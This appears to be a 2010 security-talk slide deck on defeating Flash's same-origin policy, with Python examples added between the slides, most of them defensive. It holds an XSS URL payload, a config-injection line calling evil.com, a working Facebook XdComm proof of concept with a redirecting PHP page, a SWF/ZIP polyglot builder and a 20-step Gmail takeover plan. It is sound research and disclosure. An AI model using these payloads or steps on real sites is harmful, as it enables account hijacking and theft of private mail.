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Goal 



To discuss ways Flash can be leveraged in an attack 
Not programming or implementation bugs in Flash player 
Not necessarily even Adobe's fault 



Let's find ways to abuse Flash to compromise users, websites, 
and browsers 
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Let's talk about Same Origin Policies 



Scripts on Site A cannot access scripts, cookies, or read 
content from Site B without explicit permission from Site B. 

This allows Site B to keep session data, sensitive information, 
and other resources private. 
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Javascript's Same Origin Policy 



Is a core component of webapp security. 

Relies on strongly defined boundaries between websites and 
applications (Which do not exist) 

Relies on airtight input sanitization (Which is difficult) 

Relies on airtight DNS (Which is unlikely) 

Browsers are implementing ways to bypass it on purpose 



Clearly, it isn't working, but it is currently all we have. 
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Flash's Same Origin Policy 



Modeled after Javascript's policy. 

Better implemented than Javascript (in theory), due to a clear 
boundary between the Flash application and the rest of the 
site. 

In practice, may be easier to bypass. 



Much of this talk will focus on violating this policy, with other 
tricks of the trade sprinkled throughout 
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The Easy Way: Crossdomain policies 



When attempting crossdomain communication, Flash will first 
check the crossdomain.xml file on the targeted server. 

Adobe recommends that admins do not place "Allow *" directives 
(<allow-access-from domain="*" />) in crossdomain.xml. 

...But people do anyways. Lots of people. 

Adobe recommends that admins do not place "Allow *.yourdomain.com" 
directives (<allow-access-from domain="*.yourdomain.com" />) in 
crossdomain.xml, since any subdomain hosting user content or an 
XSS bug then speaks for the whole site. 

...But people do anyways. Lots of people. 
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In 2006, Jeremiah Grossman found that 6% of the top 100 
websites have unrestricted crossdomain policies. 

He predicted that this risk was likely to grow. 



In mid-2008, Jeremiah used a slightly different set of websites, 
but found that 7% are unrestricted, and 11% have 
*.domain.com. 
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Again using a different sample, I took a look 



From the Alexa top 1,000 websites 

13.4% allow * 

37.6% allow *.domain.com 



This problem is not going away 



And it is already being exploited 
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The LiveJournal Worm 

An overly permissive crossdomain file allowed LJ account 
hijacking. 

Hijacked accounts would modify blog posts to place Flash 
payload in those accounts. 

Classic web worm behavior, but using Flash and crossdomain 
policies instead of cross-site scripting or browser exploits. 



3,300 accounts infected in a few hours 
It could have been much worse. 
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http://blogs.adobe.com/crossdomain.xml 

(Screenshot: the policy file as served, loaded in Firefox) 
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<?xml version="1.0"?> 

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain 

<cross-domain-policy> 

<allow-access-from domain="*" /> 
</cross-domain-policy> 
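An added example (not code from the talk) that classifies policy files the way the surveys above do. It runs offline on policy text passed in as a string; the three sample policies and their hostnames are constructed for the example.

```python
"""Classify crossdomain.xml policies the way the surveys above do.

Added example (not from the talk). Runs offline: the three policies
below are constructed, not fetched.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

UNRESTRICTED = "unrestricted"               # <allow-access-from domain="*"/>
WILDCARD_SUBDOMAIN = "wildcard-subdomain"   # domain="*.example.com"
RESTRICTED = "restricted"                   # explicit hosts only


def classify_policy(xml_text: str) -> Tuple[str, List[str]]:
    """Return (worst verdict, list of domain attributes) for one policy.

    expat (behind ElementTree) does not fetch the external DTD that real
    policies reference in their DOCTYPE, so no network access happens.
    """
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        raise ValueError("root element is <%s>, not a policy file" % root.tag)
    domains = [e.get("domain", "") for e in root.iter("allow-access-from")]
    verdict = RESTRICTED
    for domain in domains:
        if domain == "*":
            return UNRESTRICTED, domains     # any SWF anywhere may read this site
        if domain.startswith("*."):
            verdict = WILDCARD_SUBDOMAIN     # any subdomain (user content, XSS host...)
    return verdict, domains


def summarize(policies: Dict[str, str]) -> Dict[str, float]:
    """Percentage of hosts per verdict, the figure quoted for the Alexa sample."""
    counts = {UNRESTRICTED: 0, WILDCARD_SUBDOMAIN: 0, RESTRICTED: 0}
    for text in policies.values():
        counts[classify_policy(text)[0]] += 1
    total = len(policies) or 1
    return {k: round(100.0 * v / total, 1) for k, v in counts.items()}


# Constructed sample policies (hostnames are made up for the example).
SAMPLE_POLICIES = {
    "host-a.example": (
        '<?xml version="1.0"?>\n'
        "<cross-domain-policy>\n"
        '  <allow-access-from domain="*" />\n'
        "</cross-domain-policy>\n"
    ),
    "host-b.example": (
        "<cross-domain-policy>\n"
        '  <allow-access-from domain="*.host-b.example" />\n'
        '  <allow-access-from domain="cdn.host-b.example" />\n'
        "</cross-domain-policy>\n"
    ),
    "host-c.example": (
        "<cross-domain-policy>\n"
        '  <allow-access-from domain="partner.example.net" secure="true" />\n'
        "</cross-domain-policy>\n"
    ),
}

if __name__ == "__main__":
    for host, text in SAMPLE_POLICIES.items():
        print(host, *classify_policy(text))
    print(summarize(SAMPLE_POLICIES))
```

Point it at policies you have fetched yourself (curl the /crossdomain.xml of each host in your scope) and the summary gives you the same two percentages the slides quote.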
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Crossdomain.xml CSRF 



Remember how Flash will not read from an outside server without 
that server's permission? 

There is an exception: the crossdomain.xml file itself is fetched 
before any permission exists. 

What if we ask Flash to grab a file from our own server, but place a 
302 redirect on crossdomain.xml? 

We can redirect you to other files on other servers 

We can log you into other servers with a 302 to 
http://foo:bar@baz.com/crossdomain.xml 

No browser alerts will be triggered... as long as the password is 
correct 

Now I can log you into that router on your network with the default 
password and use CSRF to change network settings. 
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XSS in Flash Objects (Cross-Site Flashing) 



Also not new, but incredibly common 

Poorly written flash objects can take inputs as URL 
parameters, which can in turn be poisoned. 



http://foo.com/file.swf?url=javascript:alert(document.cookie); 
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Serious Flash vulns menace at least 10,000 websites 

No patch anytime soon 

By Dan Goodin in San Francisco 

Posted in Enterprise Security, 21st December 2007 23:44 GMT 

Researchers from Google and a well-known security firm have documented serious 
vulnerabilities in Adobe Flash content which leave tens of thousands of websites susceptible 
to attacks that steal the personal details of visitors. 

The security bugs reside in Flash applets, the ubiquitous building blocks for movies and 
graphics that animate sites across the web. Also known as SWF files, they are vulnerable to 
attacks in which malicious strings are injected into the legitimate code through a technique 
known as cross-site scripting, or XSS. Currently there are no patches for the vulnerabilities, 
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[WEB SECURITY] XSS vulnerabilities in 215000 flash files 

* From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx> 

* Subject: [WEB SECURITY] XSS vulnerabilities in 215000 flash files 

* Date: Thu, 27 Nov 2008 20:22:46 +0200 

Hello to Web Security Mailing List! 

It's my first letter to the list and I decided to inform the community about my interesting finding. 

Recently, 12th of November 2008, I found XSS vulnerabilities in 215000 flash files. As I wrote about at my site http://websecurity.com.ua/2609/ 
(in Ukrainian), and this is the English version of my article. 

During my research of the vulnerability at cpmstar.com (http://websecurity.com.ua/2607/) which I found at 19.01.2008, I found that on the Internet 
there are many flash files with the same vulnerability. In total there are up to 215000 flash files on the Internet which are vulnerable to 
Cross-Site Scripting (at more than 200000 sites). 

It can be seen from Google's data: 

http://www.google.com.ua/search?q=filetype%3Aswf+inurl%3AclickTAG (note: at the current time Google shows another number, which is common for it) 

And these are only those flashes which were indexed by Google, and actually there can be many more of them. In the results there are sites with 
non-vulnerable flash files (or sites which do not have the mentioned flashes any more), but these are single instances, and almost all sites in the search 
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[WEB SECURITY] XSS vulnerabilities in 8 millions flash files 

* From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx> 

* Subject: [WEB SECURITY] XSS vulnerabilities in 8 millions flash files 

* Date: Tue, 22 Dec 2009 16:16:59 +0200 

Hello participants of Mailing List. 

Recently, 18th of December 2009, I wrote the article XSS vulnerabilities in 
8 millions flash files (http://websecurity.com.ua/3781/), and yesterday I 
wrote the English version of it (http://websecurity.com.ua/3789/). 

I'll continue a topic which I started in 2008 in my article XSS 
vulnerabilities in 215000 flash files 
(http://www.webappsec.org/lists/websecurity/archive/2008-11/msg00110.html). 
That time I found hundreds of thousands of flash files vulnerable to Cross-Site 
Scripting attacks. After the previous article, published at 12.11.2008, I 
continued my research and found that many more flash files - millions of flash 
files - were vulnerable to XSS attacks. Both flash files in different global 
and local banner systems, and flash files at individual sites. 

Table of contents: 

1. Vulnerable ActionScript code. 
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[WEB SECURITY] XSS vulnerabilities in 34 millions flash files 

* From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx> 

* Subject: [WEB SECURITY] XSS vulnerabilities in 34 millions flash files 

* Date: Sun, 10 Jan 2010 22:37:31 +0200 

Hello participants of Mailing List. 

Yesterday I wrote the article XSS vulnerabilities in 34 millions flash files 
(http://websecurity.com.ua/3842/), and here is the English version of it. 

In December in my article XSS vulnerabilities in 8 millions flash files 
(http://websecurity.com.ua/3789/) I wrote that there are up to 34000000 
flashes tagcloud.swf on the Internet which are potentially vulnerable to XSS 
attacks. Taking into account that people mostly didn't pay attention in the 
previous article to my mention of another 34 millions of vulnerable 
flashes, I decided to write another article about it. 

File tagcloud.swf was developed by the author of the plugin WP-Cumulus for WordPress 
(http://websecurity.com.ua/3665/) and it's delivered with this plugin for 
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My preferred approach: XSS through RFI bugs in Flash Objects 

Many objects load a secondary XML configuration file. 

http://foo.com/file.swf?config=config.xml 

http://foo.com/file.swf?config=http://evil.com/config.xml 
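An added example (not code from the talk) showing the two checks that the poorly written objects above are missing: a scheme allowlist for a "url" parameter handed to navigateToURL/getURL, and a same-origin rule for a "config" parameter naming an XML file. The logic is written in Python so it can be run and tested here; in a real object it belongs in the ActionScript that reads loaderInfo.parameters (or _root.url / _root.config in AS2). foo.com and evil.com are the talk's own placeholders.

```python
"""Validate the 'url' and 'config' FlashVars shown above before a SWF acts on
them. Added example, not code from the talk; the checks are a model of what
the ActionScript should do. foo.com / evil.com are the talk's placeholders."""
from typing import Optional
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = ("http", "https")


def _origin(url: str):
    p = urlsplit(url)
    return (p.scheme.lower(), (p.hostname or "").lower(), p.port)


def safe_navigation_target(param: str, swf_url: str) -> Optional[str]:
    """For a 'url' FlashVar handed to navigateToURL/getURL.

    Resolves relative links against the SWF's own URL, then refuses any
    scheme other than http(s): javascript:, data:, vbscript: and file:
    would all execute in the embedding page's origin. Returns None on
    rejection so the caller simply does not navigate.
    """
    resolved = urljoin(swf_url, param.strip())
    if urlsplit(resolved).scheme.lower() not in ALLOWED_SCHEMES:
        return None
    return resolved


def safe_config_url(param: str, swf_url: str) -> Optional[str]:
    """For a 'config' FlashVar naming an XML file to load.

    Same scheme rule, plus same origin as the SWF itself: the config file
    is data the object trusts, so evil.com must not be allowed to supply it.
    urlsplit().hostname already strips userinfo, so foo.com@evil.com fails.
    """
    resolved = safe_navigation_target(param, swf_url)
    if resolved is None or _origin(resolved) != _origin(swf_url):
        return None
    return resolved


if __name__ == "__main__":
    swf = "http://foo.com/file.swf"
    for p in ("javascript:alert(document.cookie);", "/page.html"):
        print("url    ", repr(p), "->", safe_navigation_target(p, swf))
    for p in ("config.xml", "http://evil.com/config.xml", "//evil.com/config.xml"):
        print("config ", repr(p), "->", safe_config_url(p, swf))
```

Note that the same-origin rule is deliberately stricter than crossdomain.xml: even if evil.com publishes a permissive policy, the object should not be reading its configuration from there.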
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(Screenshot: a JavaScript alert on cms.paypal.com displaying the site's cookies, triggered by a "Click for XSS" link in an injected Flash object. Status bar: "Transferring data from cms.paypal.com.") 
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This all demonstrates one thing: Injecting Javascript into a 
Flash object is no more difficult than injecting Javascript into a 
web page. 
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Fun Quirk: Client-Side HPP 

A bad name for a simple attack: passing multiple copies of the 
same parameter. 

http://foo.com/file.swf?input=foo&input=bar 

Flash will interpret $input as "bar" (the last copy wins) 

http://foo.com/file.swf?input=foo#&input=bar 

Flash will still interpret $input as "bar," but in server logs, it 
shows up as "foo": the browser never sends the fragment (everything 
after the #) to the server, so only input=foo reaches the log. 

Server-side forensics may never know that the SWF was 
attacked. 

Even if they do figure that much out, they will not be able to 
find out what inputs were passed to it. 
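An added example (not from the talk) that models the quirk just described so the forensic gap can be measured: one function parses a URL the way the slide says the plugin does (everything after the first "?", fragment included, last copy wins), another reproduces what the web server can log (query string only), and a third lists the parameters whose effective value never reached the server. foo.com is the talk's placeholder host; the log line format is constructed.

```python
"""Model the client-side HPP quirk above for forensics. Added example, not
from the talk. It implements the behaviour the slide describes: the plugin
treats everything after the first '?' (fragment included) as parameters and
lets the last copy win, while the server only receives, and logs, the part
before '#'. foo.com is the talk's placeholder host."""
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit


def flash_view(url: str) -> Dict[str, str]:
    """Parameters as the SWF ends up seeing them: last duplicate wins."""
    _, _, after_q = url.partition("?")
    return dict(parse_qsl(after_q, keep_blank_values=True))


def server_log_view(url: str) -> Dict[str, List[str]]:
    """Every value the server could have logged: query only, fragment dropped."""
    seen: Dict[str, List[str]] = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        seen.setdefault(name, []).append(value)
    return seen


def unlogged_inputs(url: str) -> List[str]:
    """Parameter names whose effective value never reached the server."""
    logged = server_log_view(url)
    return sorted(name for name, value in flash_view(url).items()
                  if value not in logged.get(name, []))


def log_line(url: str) -> str:
    """The request line an access log would contain (constructed format)."""
    p = urlsplit(url)
    return "GET %s HTTP/1.1" % (p.path + ("?" + p.query if p.query else ""))


if __name__ == "__main__":
    for u in ("http://foo.com/file.swf?input=foo&input=bar",
              "http://foo.com/file.swf?input=foo#&input=bar"):
        print(log_line(u), "| SWF sees", flash_view(u),
              "| unlogged:", unlogged_inputs(u))
```

The second URL is the interesting one: the access log records input=foo, the object ran with input=bar, and unlogged_inputs() is the only place that difference shows up. A client-side capture (proxy or browser history, which do keep the fragment) is the only evidence that survives.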
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More Cross-domain Communication 



In these examples, Javascript called from a Flash object runs 
in the same security domain that the object was served from. 

Performing these exploits requires iframing the object. 

But what if we embed that object in another website? 



Hello, cross-domain communication. 



Goodbye, same-origin policy. 
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How do we exploit it? 



Embed a malicious object in a page on the target server 



Corrupt an innocent, but poorly written flash object 



Place a malicious object on the targeted server 
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Embed a malicious object in a page on the target server 



Generally requires HTML injection... In which case you 
probably have an XSS vulnerability anyways. 



Probably not the best attack, but there are believable 
scenarios: 

Place an innocent-but-useful object on my server, invite 
people to embed it on their web page, then swap it out. 
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Corrupt an innocent, but poorly written flash object 



This is covered by the previous Cross-Site Flashing 
discussion 



But there is another approach: 



If an "innocent" Flash object executes calls (or exports 
methods) to Javascript on the embedding page, those calls 
can be intercepted and return poisoned data. 
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http://static.facebook.com/swf/XdComm.swf 

(decompiled ActionScript) 

private function init(event:Event):void { 
    this.removeEventListener(Event.ENTER_FRAME, this.init); 
    ExternalInterface.addCallback("sendXdHttpRequest", this.sendXdHttpRequest); 
    ExternalInterface.addCallback("setCache", this.setCache); 
    ExternalInterface.addCallback("getCache", this.getCache); 
    ExternalInterface.addCallback("setCacheContext", this.setCacheContext); 
    ExternalInterface.addCallback("clearAllCache", this.clearAllCache); 
    ExternalInterface.call("FBOnFlashXdCommReady"); 
    return; 
} // end function 
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http://static.facebook.com/swf/XdComm.swf 

(decompiled ActionScript, continued; the fbTrace line is cut off in the screenshot) 

} // end function 

XdComm.fbTrace("SendXdHttpRequest", {method: method, url: url, 
if (url.indexOf("https://") != 0 && url.indexOf("http://") != 0) 
{ 
    url = "http://" + url; 
} 
if (!/^https?:\/\/api(.*)\.facebook\.com/.test(url)) { 
    return 0; 
} 
var _loc_6:* = XdComm; 
var _loc_7:* = XdComm.requestIdCount + 1; 
_loc_6.requestIdCount = _loc_7; 
var req:* = new URLRequest(url); 
loader = new URLLoader(); 
reqId = XdComm.requestIdCount; 
req.method = method; 
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http://skeptikal.org/facebook_exploit.html 

FBOnFlashXdCommReady = function(){ 
    document.getElementById('swfPwn').sendXdHttpRequest( 
        'http://api.facebook.com.skeptikal.org/exploits/redirect.php', null, null); 
} 

FBOnXdHttpResult = function(reqid, page_content){ 
    page_content = FB_reverse_undo_everything(stringy); 
    if (page_content.match(/Log In/)){ 
        alert("Shucks, you're not logged in to Facebook"); 
        return 0; 
    } 
    alert(page_content); 
} 

payloadUrl = 'http://static.facebook.com/swf/XdComm.swf'; 

document.write('<embed src="'+payloadUrl+'" id="swfPwn" quality="high" width="1" height="1" style="border:0px solid red;" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" allowscriptaccess="always" />'); 
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http://api.facebook.com.skeptikal.org/exploits/redirect.php 

<?php 
header('Location: http://m.facebook.com/inbox/'); 
?> 
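An added example (not Facebook's code, and not from the talk) that isolates the bug the exploit above depends on. The first regex is the decompiled XdComm check transliterated to Python; the hardened version is an assumption about what the check should have been: parse the URL, take the host component only, and anchor the pattern on both ends. skeptikal.org is the talk's attacker host.

```python
"""Why the XdComm host check above fails, and what a correct one looks like.
Added example, not Facebook's code: XDCOMM_RE is the decompiled ActionScript
check transliterated; hardened_allows() is an assumed replacement."""
import re
from urllib.parse import urlsplit

# Transliterated from the decompiled SWF: unanchored on the right, and (.*)
# lets "api.facebook.com" be followed by any attacker-controlled suffix.
XDCOMM_RE = re.compile(r"^https?://api(.*)\.facebook\.com")


def xdcomm_allows(url: str) -> bool:
    if not (url.startswith("https://") or url.startswith("http://")):
        url = "http://" + url                    # same normalisation as the SWF
    return XDCOMM_RE.match(url) is not None


# Host labels starting with "api", then exactly ".facebook.com" at the end.
ALLOWED_HOST_RE = re.compile(r"^api[a-z0-9-]*(\.[a-z0-9-]+)*\.facebook\.com$")


def hardened_allows(url: str) -> bool:
    """Parse first, then match the host component alone, anchored on both ends.

    urlsplit().hostname is lower-cased and has userinfo stripped, so the
    user:pass@host trick from the crossdomain.xml CSRF slide does not help
    either: http://api.facebook.com@skeptikal.org/ has hostname skeptikal.org.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").rstrip(".")    # drop the trailing-dot FQDN form
    return ALLOWED_HOST_RE.match(host) is not None


if __name__ == "__main__":
    for u in ("http://api.facebook.com/method/fql.query",
              "http://api.facebook.com.skeptikal.org/exploits/redirect.php",
              "http://api.facebook.com@skeptikal.org/"):
        print("%-62s xdcomm=%-5s hardened=%s" % (u, xdcomm_allows(u), hardened_allows(u)))
```

The general lesson is that a host allowlist applied to a whole URL string with a regex is almost always wrong; match the parsed host, and require the match to consume it entirely.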
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http://skeptikal.org/idle/ipad_awesomeness.png 

(Screenshot: the victim's "Facebook | Inbox" page, "6 messages" with previews, rendered inside the attacker's page, confirming the cross-domain read succeeded) 
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Place a malicious object on the target server 



Webmail allows attachments 

Internal web applications have customer spec sheets, code 
checkins, etc. 

Document repositories 

Mirror sites and syndication 

Image galleries 

Forums 

Ecommerce sites 

Advertisers with Flash banners 

Mass hosting 
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If I can upload a flash file directly to your server. 

and you serve that file back to me... 

it can be embedded in, and run javascript on... 



my domain. 
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Flash Scratch Script (http://skeptikal.org/exploits/flash_sploit.html) 

(Screenshot: the page at http://skeptikal.org shows an alert reading "api.photoshop.com") 

Page source: 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> 
<head> 
<meta http-equiv="content-type" content="text/html; charset=UTF-8" /> 
<title>Flash Scratch Script</title> 
</head> 
<body> 
<embed src="http://api.photoshop.com/home_a7059066a84e4f26b512b7bbb99e2706/adobe-px-thumbnails/84b275532ca44328b9468d04f244caf1/fullsize.jpg" quality= 
</body> 
</html> 
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How is this different from uploading a Javascript file? 

An uploaded Javascript file will not execute: it needs to be 
embedded in a web page. 

An uploaded HTML page will not execute* 

An uploaded SWF file will be executed. 

This makes it slightly easier to get a SWF on a server: it can 
have any file extension, and be served with any content-type 
header. 

*except with certain extensions on Internet Explorer. This is also dumb. 
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Remember GIFAR? 

The SWF file format requires a specific set of bytes at the 
beginning of the file, but allows an arbitrary amount of "junk" data 
at the end of the file. 



The ZIP format, on the other hand, allows junk data at the 
beginning of the file, and the actual data can be placed at the 
end. 



Because of this fact, we can create files that are both a valid 
Flash object and a valid Zip file. 



Try validating that server-side. 
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But wait, there's more! 



Many file formats are essentially just ZIP files 

Office Open XML (docx, pptx, etc) 

JAR (If you want to be silly) 

XPI 

Self-extracting executables 



If you can't upload your SWF directly, try one of these 
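An added example (not from the talk) that builds the polyglot described on the two slides above and shows the one server-side check that defeats it. The SWF part is a minimal one-frame stub with no script in it (a real payload would carry the script tags); the ZIP member name and contents are constructed. Python's zipfile reads archives with data prepended, which is exactly why ZIP-based formats tolerate the SWF in front.

```python
"""Build and check a SWF/ZIP polyglot of the kind described above. Added
example, not from the talk. The SWF part is a minimal one-frame stub with no
script; the ZIP member is constructed."""
import io
import struct
import zipfile

SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")   # uncompressed, zlib, LZMA
ZIP_LOCAL_HEADER = b"PK\x03\x04"


def minimal_swf() -> bytes:
    """'FWS' + version + file length, then RECT, frame rate, frame count, tags."""
    body = bytes([0x00])                         # RECT with Nbits=0 (empty stage)
    body += struct.pack("<HH", 0x0C00, 1)        # 12.0 fps (8.8 fixed), 1 frame
    body += struct.pack("<H", (1 << 6) | 0)      # ShowFrame: tag code 1, length 0
    body += struct.pack("<H", 0)                 # End tag
    return b"FWS" + bytes([10]) + struct.pack("<I", 8 + len(body)) + body


def zip_bytes(member_name: str, member_data: bytes) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(member_name, member_data)
    return buf.getvalue()


def build_polyglot(member_name: str, member_data: bytes) -> bytes:
    """SWF first (the player only looks at the start), ZIP after it (ZIP
    readers locate the archive from the end-of-central-directory record)."""
    return minimal_swf() + zip_bytes(member_name, member_data)


def is_swf(data: bytes) -> bool:
    return data[:3] in SWF_MAGICS


def is_zip(data: bytes) -> bool:
    return zipfile.is_zipfile(io.BytesIO(data))


def read_member(data: bytes, member_name: str) -> bytes:
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return z.read(member_name)


def accept_zip_upload(data: bytes) -> bool:
    """Server-side rule for docx/jar/xpi uploads: the archive must begin at
    offset 0, which an SWF-first polyglot cannot do, and must not carry a
    SWF signature at the start whatever the claimed extension."""
    return data[:4] == ZIP_LOCAL_HEADER and not is_swf(data) and is_zip(data)


if __name__ == "__main__":
    poly = build_polyglot("[Content_Types].xml", b"<Types/>")
    print("SWF:", is_swf(poly), "ZIP:", is_zip(poly),
          "member:", read_member(poly, "[Content_Types].xml"),
          "accepted:", accept_zip_upload(poly))
```

"Is it a valid ZIP?" and "is it a valid SWF?" both answer yes for the polyglot, so neither check alone helps; the start-of-file check works because the Flash Player reads from the front and a ZIP reader from the back, and only one of them can have offset 0.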
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(Screenshot: a local JIRA instance at http://172.16.100.129:8080/browse/BORK-3, issue "[#BORK-3] asdf" reported and assigned by admin, with the file attachment "origin_whatsit.jpg (0.9 kB)", the renamed SWF) 
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(Screenshot: http://skeptikal.org/exploits/flash_sploit.html, "Flash Scratch Script", loaded alongside a tab showing the JIRA attachment "origin_whatsit.jpg (JPEG Image)") 
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How to Hack a Gmail account 



Webmail lives on mail.google.com 



Webmail attachments live on mail.google.com 



Seems simple? Not quite. 
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Plan A 



Send email to victim with attachment 

Email goes to spam box, but is still accessible from the 
account 

I can load the flash object out of the victim's account 



Nope. 



I need to know the messageID of the attachment to include it 
I don't know your messageIDs 
I do know my messageIDs 



© 2010 - Foreground Security and Skeptikal, LLC. All rights reserved 



Plan B 



Send email to myself with attachment 

Log user into my account via CSRF 

Load malicious attachment into browser 

Log user out in the background 

Convince user to log in to his account (without unloading the 
current page) 

Use Flash to execute requests against the Gmail server, 
reading the contents of the victim's inbox 
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Other Problems 

Token-based CSRF protection on login 

Solution: Cross-subdomain cookie manipulation, which can force 
CSRF tokens and bypass protection. 

Finding an XSS hole in *. google. com 

Solution: Google gadgets can be poisoned with arbitrary XML files, 
injecting javascript into sites.google.com 

Content-disposition Header 

Solution: Convince Gmail the attachment is an image, which will be 
served as "inline" instead of "attachment" 

Framebusters 

Solution: This is a race condition. Unload the page by destroying the 
iframe after it sends a response (And sets cookies), but before 
Javascript renders. 
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More Other Problems 

Race condition timing issues 

Solution: DOM quirks and network speed analysis solve it for 
Firefox, but that's another talk. 

Getting the User to log back in 

Solution: A mild form of social engineering. A registration page which 
asks him to check his email to confirm registration. 

Detecting whether the user has logged in 

Solution: Have the flash object periodically poll a Gmail 
documentation page, which lives on mail.google.com but does not 
redirect the user to www.google.com if he is not logged in (as this 
would cause the Flash object to request 
www.google.com/crossdomain.xml, which would disallow this 
domain and halt payload execution). 
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The Final Exploit: 20 Steps 



I create a SWF payload 

I change the file extension to .jpg 

I send it to my Gmail account as an attachment 

I get the URL of that attachment, add it to my web page 

You hit my web page 

My page logs you out of Gmail via CSRF 

You request Google gadget from sites.google.com 

Google requests XML config file from my server 

You load the gadget, which is poisoned with XSS 

The XSS payload adds an arbitrary cookie to your browser 

I log you into my Gmail account via CSRF (with the forced cookie) in an iframe 

I destroy the login iframe before it can execute its framebuster code 

You request the payload out of my inbox 

Thinking it is an image, Google serves it up without the content-disposition header 

You execute the payload as a SWF 

The payload executes Javascript in my page, informing me that it is running 

My page logs you out of my Gmail account via CSRF 

The payload waits, loading and parsing the Gmail help page periodically to detect whether you are logged in 

You log in to your Gmail account in another tab 

The SWF now has full read/write access to your Gmail account 

I do a victory dance 
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Why not just disable Flash? 

(Screenshot of a reader comment on The Register, posted by @jake, Wednesday 23rd December 2009 17:56 GMT:) 

"More to the point, WHY? Has anything useful ever been done 
with Flash?" 

http://www.badgerbadgerbadger.com/ 

Good luck with that 
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Questions? 



mckt@skeptikal.org 



